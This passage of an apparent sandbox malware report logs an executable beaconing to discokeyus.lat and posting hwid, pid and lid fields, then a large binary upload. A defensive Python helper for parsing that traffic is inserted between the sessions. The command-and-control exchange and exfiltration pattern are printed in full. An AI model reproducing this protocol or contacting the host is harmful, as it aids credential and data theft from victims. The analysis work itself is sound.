                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wjU6lXlpjLNkAco2f%2F2LHjj4Bmw%2BKyUUllg8uuzj%2FO88fN9EH9jeDyDI0KWsFRNdmRFQsYIunP1hlTLMUAjPWmq9dzQMDvo1tRpMdZw9vvxmKXP%2BtboK11xpcOxETuiqfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc29bc1d7c8d-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2046&rtt_var=780&sent=14&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15959&delivery_rate=1390476&cwnd=185&unsent_bytes=0&cid=9a6927bb930d114a&ts=1141&x=0"
2024-12-20 16:24:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f<CR><LF>ok 8.46.123.189<CR><LF>  (chunk-size line 0xf = 15, followed by the 15-byte chunk "ok 8.46.123.189")
2024-12-20 16:24:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0<CR><LF><CR><LF>  (zero-length chunk that terminates the chunked body)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.5 | 49728       | 104.21.21.99   | 443              | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:53 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=YDADZDCTSSFX6QBKKQ
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20567
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:53 UTC15331OUTData Raw: 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 44 41 44 5a 44 43 54 53 53 46 58 36 51 42 4b 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
Data Ascii (CRLFs restored from the raw bytes):
--YDADZDCTSSFX6QBKKQ
Content-Disposition: form-data; name="hwid"

BFE010B77A467519AC8923850305D13E
--YDADZDCTSSFX6QBKKQ
Content-Disposition: form-data; name="pid"

3
--YDADZDCTSSFX6QBKKQ
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
                                                                                                                                            2024-12-20 16:24:53 UTC5236OUTData Raw: 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
2024-12-20 16:24:54 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:54 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=k4vb5g979npq2j8jdmlpouhi58; expires=Tue, 15 Apr 2025 10:11:33 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lSoeRlNHAI58wKSCxJx27BDY4F4m57qqCgvsppSsEiiDQ3Hvfz3F4dg0pa64RSVP4RWga6TR%2FrNkEzJJ1QdCd1pluKkzGw5KgCK0HtF3FinLoc3mdAj%2F%2BKfVg5naz6yR8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc392a73422f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1570&rtt_var=629&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21527&delivery_rate=1684939&cwnd=137&unsent_bytes=0&cid=d795a9e5c873f6bc&ts=985&x=0"
2024-12-20 16:24:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f<CR><LF>ok 8.46.123.189<CR><LF>  (chunk-size line 0xf = 15, followed by the 15-byte chunk "ok 8.46.123.189")
2024-12-20 16:24:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0<CR><LF><CR><LF>  (zero-length chunk that terminates the chunked body)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49731       | 104.21.21.99   | 443              | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:56 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=YEI62A1UWSBO
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1220
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:56 UTC1220OUTData Raw: 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a
Data Ascii (CRLFs restored from the raw bytes):
--YEI62A1UWSBO
Content-Disposition: form-data; name="hwid"

BFE010B77A467519AC8923850305D13E
--YEI62A1UWSBO
Content-Disposition: form-data; name="pid"

1
--YEI62A1UWSBO
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--YEI62A1UWSBO
2024-12-20 16:24:57 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:57 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=k9jjatsv5jahh5eu99meranmgs; expires=Tue, 15 Apr 2025 10:11:35 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FCLD5hD8TV%2FP8sdky4iEeZpX7G5Io47mrz1r86F6IoobR41FpXzJVZG81X4CE5JlO2Li8SAaCbkhJz%2BleCmSvGQrILjuK7hviWfzwUpfFPmUsVXCLrExQnVd%2F0dAcgKuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc484bac72b7-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=750&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2129&delivery_rate=1458541&cwnd=192&unsent_bytes=0&cid=d194f17ab3cf100e&ts=1057&x=0"
2024-12-20 16:24:57 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f<CR><LF>ok 8.46.123.189<CR><LF>  (chunk-size line 0xf = 15, followed by the 15-byte chunk "ok 8.46.123.189")
2024-12-20 16:24:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0<CR><LF><CR><LF>  (zero-length chunk that terminates the chunked body)
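Added triage helper for the POST /api exchange shown in sessions 4 and 5 above; this is example code, not code from the report, the sandbox or the sample. It splits a raw HTTP/1.1 message into start line, headers and body, walks the multipart/form-data body to recover the hwid, pid and lid fields without damaging binary parts (only the single CRLF before each delimiter is stripped), decodes the chunked reply and pulls the IP out of the "ok <ip>" acknowledgement. The request and response bytes at the bottom are constructed to mirror session 5; the report truncates the request body, so only the three visible fields are reproduced. is_beacon_shape is a heuristic drawn solely from what these captures show (32 upper-case hex hwid, numeric pid, a lid field present), not a documented protocol rule.

```python
import re

CRLF = b"\r\n"


def split_http_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value} per form-data part. Values stay bytes (later
    parts of this traffic are binary); only the CRLF before the next delimiter is
    stripped, so binary values are not damaged."""
    delim = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delim):
        if not part:
            continue
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        if part.startswith(CRLF):
            part = part[2:]
        part_headers, _, value = part.partition(CRLF + CRLF)
        if value.endswith(CRLF):
            value = value[:-2]
        m = re.search(rb'name="([^"]*)"', part_headers)
        if m:
            fields[m.group(1).decode("latin-1")] = value
    return fields


def decode_chunked(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; chunk extensions are ignored."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(CRLF, pos)
        size = int(body[pos:end].split(b";")[0], 16)
        if size == 0:
            break
        start = end + 2
        out += body[start:start + size]
        pos = start + size + 2              # skip the CRLF after the chunk data
    return bytes(out)


def is_beacon_shape(fields: dict) -> bool:
    """Heuristic from the captured sessions: 32-hex hwid, numeric pid, a lid."""
    hwid, pid = fields.get("hwid", b""), fields.get("pid", b"")
    return ("lid" in fields and pid.isdigit()
            and re.fullmatch(rb"[0-9A-F]{32}", hwid) is not None)


def triage(raw_request: bytes, raw_response: bytes) -> dict:
    """Summarise one request/response pair the way an analyst would log it."""
    start, req_headers, req_body = split_http_message(raw_request)
    method, path, _ = start.decode("latin-1").split(" ", 2)
    m = re.search(r'boundary="?([^";]+)"?', req_headers.get("content-type", ""))
    fields = parse_multipart(req_body, m.group(1)) if m else {}
    _, resp_headers, resp_body = split_http_message(raw_response)
    if resp_headers.get("transfer-encoding", "").lower() == "chunked":
        resp_body = decode_chunked(resp_body)
    reply = resp_body.decode("latin-1").strip()
    ack = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", reply)
    return {
        "method": method, "path": path, "host": req_headers.get("host"),
        # text fields decoded, binary ones summarised by length
        "fields": {k: v.decode("ascii") if v.isascii() else f"<{len(v)} bytes>"
                   for k, v in fields.items()},
        "beacon_shape": is_beacon_shape(fields), "reply": reply,
        "ack_ip": ack.group(1) if ack else None,
    }


# Constructed sample mirroring session 5 (body truncated in the report: 3 fields).
_B = b"YEI62A1UWSBO"

def _part(name: bytes, value: bytes) -> bytes:
    return (b"--" + _B + CRLF + b'Content-Disposition: form-data; name="'
            + name + b'"' + CRLF + CRLF + value + CRLF)

SAMPLE_BODY = b"".join([_part(b"hwid", b"BFE010B77A467519AC8923850305D13E"),
                        _part(b"pid", b"1"), _part(b"lid", b"PsFKDg--pablo"),
                        b"--" + _B + b"--" + CRLF])
SAMPLE_REQUEST = b"".join([
    b"POST /api HTTP/1.1" + CRLF,
    b"Content-Type: multipart/form-data; boundary=" + _B + CRLF,
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + CRLF,
    b"Host: discokeyus.lat" + CRLF + CRLF, SAMPLE_BODY])
SAMPLE_RESPONSE = b"".join([
    b"HTTP/1.1 200 OK" + CRLF, b"Content-Type: text/html; charset=UTF-8" + CRLF,
    b"Transfer-Encoding: chunked" + CRLF, b"Connection: close" + CRLF + CRLF,
    b"f" + CRLF + b"ok 8.46.123.189" + CRLF + b"0" + CRLF + CRLF])
```

Feed triage() the raw request and response bytes of one session (from a pcap follow-stream export or a proxy log) and it returns host, path, the decoded form fields, whether they match the shape seen here, the decoded reply and the acknowledged IP; binary parts such as the blobs in session 6 are reported by length only.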


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.5 | 49732       | 104.21.21.99   | 443              | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:58 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=Z3PDZSBFPSX6O
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 550974
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58
Data Ascii (CRLFs restored from the raw bytes):
--Z3PDZSBFPSX6O
Content-Disposition: form-data; name="hwid"

BFE010B77A467519AC8923850305D13E
--Z3PDZSBFPSX6O
Content-Disposition: form-data; name="pid"

1
--Z3PDZSBFPSX6O
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--Z3PDZSBFPSX
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: e1 78 cd c8 2c ac f4 a4 06 8d 7b fd 6b 26 bb ec 5b 2c 05 36 e1 07 ea 53 ee 5d f6 93 d0 cc 09 c6 55 be 5f e2 e0 db 3b 1c 93 b5 58 b3 73 54 72 f9 fb 0d 2a 16 be 23 1c a1 eb 46 da 4a d9 ca 39 29 74 7e 7e e4 b2 b2 3b 8f 2c 76 f3 8a 9c 66 26 2c 42 e9 76 d5 d6 cd 7e e0 1f f7 13 7d 33 27 3b 86 8c 8d fd b7 4a 32 9c 6d d9 a4 4c 55 1a 1d a9 88 7a e0 c9 48 e9 48 61 05 28 3e fb 9d 8e f3 b2 f4 d0 08 f0 21 61 10 ef 87 4d 14 bd 07 b1 1c 31 30 32 14 56 76 6e 64 8c 5f c8 6a a4 e9 f3 13 de 82 d4 88 c6 f9 37 0d 49 b3 7f 9b 52 48 7c c1 3c 39 21 d0 f3 c0 2d fc ac c3 82 89 3f 2e f5 67 66 a0 10 40 15 e6 0e c6 ee 26 ea a5 94 67 66 9a 98 a8 e3 ed ac 0a 44 a8 b3 6c 55 c6 27 1f 0a ed 26 16 69 c8 72 10 92 9a bd 33 49 bf 58 ea 5f f0 39 cd 5f f8 db 94 3a ab 43 bd 20 42 9d c9 ff 39 4a
                                                                                                                                            Data Ascii: x,{k&[,6S]U_;XsTr*#FJ9)t~~;,vf&,Bv~}3';J2mLUzHHa(>!aM102Vvnd_j7IRH|<9!-?.gf@&gfDlU'&ir3IX_9_:C B9J
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: e8 d8 ef b6 e8 fa 3a 54 43 6e ba 94 de 2e f5 fa d3 ba e2 b3 df d6 92 17 f5 05 b5 89 4f 9f ec 97 8b 91 e5 f3 4a ef 24 bc e7 51 13 28 bb 1a 54 2c 43 91 3f 44 c4 83 de 5b fd d1 f1 26 b0 17 b8 a0 c6 f0 d7 2c 05 4e 50 5c 26 8a 41 c0 f8 14 49 69 bd 3b 8f 37 3d 7b ca 1f 5e 66 7f 0c 3f e5 f0 f8 05 ab 21 f8 c3 ac c7 db c5 97 f2 ac c8 a1 47 c3 2b 7c 94 ea 1b 14 6a 15 a3 98 af 62 ef 4c b0 f7 01 7e 54 84 1c c5 94 be d3 9b ef 74 5a 19 44 3e cf 0d 4f 89 d2 31 28 56 5c 09 ca 3c 1f cc 2b 59 47 a9 27 63 61 f3 b7 cb d4 07 b0 d7 44 4f 8c 61 75 f9 0a 6a bb 32 73 bf 55 53 ee 2d 91 57 72 9a a4 4b 97 25 05 cf 79 e6 58 c4 ee e7 e7 49 ba 58 df bf 8e 80 ca b5 b0 60 c2 39 79 ff 15 c1 7a 38 0a ba b2 52 dc c6 39 9d 4f 6d 96 f0 1a 88 e3 15 34 6b 8f b0 cf a9 12 c6 5b 41 53 d0 b7 d1 c4
                                                                                                                                            Data Ascii: :TCn.OJ$Q(T,C?D[&,NP\&AIi;7={^f?!G+|jbL~TtZD>O1(V\<+YG'caDOauj2sUS-WrK%yXIX`9yz8R9Om4k[AS
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: d7 37 ab ef 09 b0 0c 7e 1e 04 67 9f 62 8b 84 40 64 b7 fa 30 a6 61 da 93 08 ac 6e 22 55 08 f7 b0 fc 22 39 71 eb 3c 5f 3c 16 9f 4a ff dc 8f e1 44 0d 56 12 a1 58 e2 11 89 bf 2f b7 25 dd 75 44 51 1b 09 53 06 b4 28 ab 7e 46 62 f5 c6 bd f3 6b 2e 4d dc fa 0d a9 1c 9f 6a 7f ff 8a 4b 0e 3d f5 5a 28 ca 77 d3 f0 bf 76 88 87 25 13 be 26 c7 0b d6 d9 87 8d ea 84 e9 4b 47 21 72 5b 46 5f a8 58 f0 df a9 32 a5 73 ef 4e 58 f7 46 d9 7d c9 7f 3f ba 5d 7e d3 e4 98 46 82 1b b1 e6 ae 2f fa f7 5f 57 05 32 59 21 25 1c a6 17 16 1d b6 67 c4 f7 84 da 8d 6a de 48 35 d9 fe 54 92 f1 79 17 1f 62 4f 69 02 1e a8 60 7f 12 53 86 12 bf 76 a1 c3 ac ae b6 23 b7 d7 d6 1d ef 90 f4 03 ba b8 4d c3 28 23 9d df ed bb 41 eb 8f 76 8f 99 74 5d bc 96 9c 9d 3b 70 48 b2 8f 1e a0 bd ef 8f 38 d2 b0 b3 27 ec
                                                                                                                                            Data Ascii: 7~gb@d0an"U"9q<_<JDVX/%uDQS(~Fbk.MjK=Z(wv%&KG!r[F_X2sNXF}?]~F/_W2Y!%gjH5TybOi`Sv#M(#Avt];pH8'
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 99 72 d4 3f a3 1e 3c 55 9a ed 17 5c 5f 32 87 53 95 d0 46 4b e2 8b 9b 07 4b 94 d3 14 e2 71 2e 86 e4 1c eb e7 b6 1a 23 6b 11 53 2a 54 d3 70 9f 9d 2a 1e e5 a1 11 db da a7 52 8c 02 d4 05 28 aa e0 d4 43 79 c5 0a 95 0d 32 a1 55 4b 5a 76 64 3d 0e d7 2d b1 8f 3e 33 58 f0 6b bd e5 8c 86 ef c8 e5 80 7e 5d 2d ec c9 cc 97 60 2c ee c4 4c 18 cf e0 8f 4c 68 e6 69 8f 4b 41 b0 c3 d2 f2 89 6b fc ed 6d df 62 16 fa c6 97 0b 7c 83 c8 e6 cd 99 3f 69 9f e8 d7 d7 9a e6 fe fb 51 9c ac 01 c8 4e 0a 40 fe a9 a3 d5 7c f4 6d 68 b1 2b 64 72 ba d3 8e 4a 17 b3 9a a9 7d 1c a9 c0 34 ac d2 15 0b 56 62 ba 7f 9e 17 0b b0 d0 46 02 f4 0c 84 9f d7 94 f2 2a ff 6d 74 a4 ea b0 2e 91 87 f7 23 bf b5 4b c5 8d f2 74 7f c2 9b 49 8b de 30 e2 fa 94 07 15 d1 9a f9 78 57 dc 75 01 72 65 86 e9 0d f1 cc 7e f4
                                                                                                                                            Data Ascii: r?<U\_2SFKKq.#kS*Tp*R(Cy2UKZvd=->3Xk~]-`,LLhiKAkmb|?iQN@|mh+drJ}4VbF*mt.#KtI0xWure~
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 72 6d 63 cb e8 ba 88 a1 c4 e0 a2 9a 8c 8c 70 aa ee 46 87 46 43 00 8f a8 74 66 df 1f 96 43 cc e4 cd 95 d1 94 e0 3d 75 11 9a cd 55 94 ef c8 32 d9 96 d5 14 19 48 72 29 c5 c0 45 4d 5a 5c 54 73 50 34 f2 c0 c7 c4 9e ab 60 58 cd 7a cb 60 b1 19 15 e7 af 8a 53 e8 a9 bf 4f 5f 31 d7 48 b9 15 19 2d 70 e4 26 88 f1 72 13 d1 0e a9 3f ac cf 2c b6 3e 6b e5 94 51 82 fe 38 fd 70 f6 d7 3f 59 2f 15 31 f4 fc 55 ba 14 c5 d4 ae dd 34 0c e2 1e 10 cb 9e 66 da d5 4a 66 2b 83 d6 47 b0 88 91 5c 65 aa b1 6e b8 6e 3c ca 36 3a 0d 45 f1 e7 bf 9e f8 93 86 32 e4 5d 9f e2 ab 54 c3 3f 7d d4 9d 69 22 1f c7 d9 2b 73 36 3a 5d 97 2b 26 79 48 e1 f7 4a ef 93 f0 b7 49 fd a3 4d be 6a c6 8f 0a a2 83 51 14 63 a3 a8 50 22 c7 3b aa 54 5d 6c e0 9c 44 dd 0d c7 92 4d 02 7a 5e b5 fa 86 4b 02 05 1b 24 b6 d6
                                                                                                                                            Data Ascii: rmcpFFCtfC=uU2Hr)EMZ\TsP4`Xz`SO_1H-p&r?,>kQ8p?Y/1U4fJf+G\enn<6:E2]T?}i"+s6:]+&yHJIMjQcP";T]lDMz^K$
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: b4 a1 ab 87 8d ec 5a b3 61 c2 98 c9 62 90 c0 15 58 61 73 76 11 7b 75 f2 a8 84 1b 32 01 62 38 87 e1 fa 5d 97 a7 34 3c 1b d7 1b 6c f5 34 b2 e4 e9 5d 61 e3 b8 b6 1c 02 ac 31 a8 06 79 fa ac c8 b5 66 7f f3 9c c4 3a 51 1b ca 0a ee 44 b9 c6 67 85 a0 76 02 a7 15 fc 18 e6 b5 fb 01 2f 0d 48 03 ce aa 35 13 5f 06 0b 67 d8 f6 c3 cc d0 24 29 62 05 3f 4f b3 b5 fe fa e0 88 f8 47 35 8b 21 bb 32 9b 15 f5 d9 57 fb a9 64 90 90 b0 55 48 89 f4 a6 8e f0 fb af b8 44 78 fc 5a 8c 79 30 1b 58 bb 5e 15 c5 fd a7 2e 5e 7a 3b 91 c3 5f a1 c8 f1 a2 7e 65 f2 66 3f fb 9e 0e f3 ff ce 6b ed 79 ba fa 77 f5 d1 fb 9e bd 77 f6 16 1c 15 c4 ff b8 6f 1e 65 13 d9 20 09 96 a6 aa 57 73 3d b7 a4 58 44 86 88 08 54 00 ef c9 d3 f2 19 61 0f 65 1e 6e ba d8 54 d0 a4 04 cc de 0c 4d fc 37 73 61 08 64 a1 69 1e
                                                                                                                                            Data Ascii: ZabXasv{u2b8]4<l4]a1yf:QDgv/H5_g$)b?OG5!2WdUHDxZy0X^.^z;_~ef?kywwoe Ws=XDTaenTM7sadi
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 6b b3 4c e2 40 ad 4a 4d df 9c cd 37 19 5b 05 7c 33 98 87 96 65 26 2e 94 db 50 45 ae 02 ec 0b 24 c1 40 f0 e5 30 c9 ad ef e6 65 d4 45 bb c2 66 f4 c8 aa 93 2f 55 47 56 26 6c 80 1d 18 16 97 5b 01 72 e3 fb 37 cc 78 ff b6 99 41 24 92 08 c2 12 35 9e 2d 46 99 37 d2 a3 f0 8b 56 ef 3e 53 df b4 da 5e 62 a4 4f 48 11 76 76 e8 90 94 6f e4 10 ec 06 a9 8b 07 ba ac ac 9c bb 88 6d 82 e6 78 fc 4c 44 44 59 3c d5 3e 50 fd d8 69 f1 25 a3 ce 94 38 f5 9e 09 df 95 10 0b fc 87 cb a9 e3 f8 bd df fa 2b fe 46 e7 0e b7 98 a0 8a b2 8b 58 13 7c 43 d4 d2 6f bf 1a 95 a1 e9 d0 f1 89 f1 9f 3f 18 d2 24 13 a6 b9 75 a4 e8 42 5b 7b 36 55 58 b4 de 7d 35 0f 91 19 52 23 3a 3e ca b0 b2 88 0b 01 51 ed ef 0b f4 00 b1 02 2d ca 39 ae 8f 50 c2 1c 85 0e e6 69 ca e7 05 7a 98 b6 d8 0f 66 55 70 a6 0e 13 4d
                                                                                                                                            Data Ascii: kL@JM7[|3e&.PE$@0eEf/UGV&l[r7xA$5-F7V>S^bOHvvomxLDDY<>Pi%8+FX|Co?$uB[{6UX}5R#:>Q-9PizfUpM
